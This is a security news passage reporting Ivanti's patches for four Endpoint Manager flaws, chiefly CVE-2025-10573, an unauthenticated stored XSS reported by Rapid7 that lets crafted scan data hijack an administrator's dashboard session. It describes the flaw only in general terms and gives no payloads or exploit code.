Ivanti EPM Update Patches Critical Remote Code Execution Flaw

The XSS vulnerability could allow remote attackers to execute arbitrary JavaScript code with administrator privileges.

Ivanti on Tuesday announced patches for four vulnerabilities in Endpoint Manager (EPM), including a critical-severity flaw leading to remote code execution (RCE).

The security defect, tracked as CVE-2025-10573 (CVSS score of 9.6), is described as a stored cross-site scripting (XSS) issue that can be exploited without authentication.

Providing organizations with remote administration, vulnerability scanning, and management of connected systems, Ivanti EPM includes an API that consumes device scan data.

The critical EPM vulnerability allows attackers to submit device scan data containing malicious payloads that would be processed and embedded in the web dashboard, says Rapid7, which discovered and reported the bug in August.

When an administrator accesses the dashboard interface and views the device information, the payload triggers client-side JavaScript execution, allowing the attacker to gain control of the administrator’s session, the company ...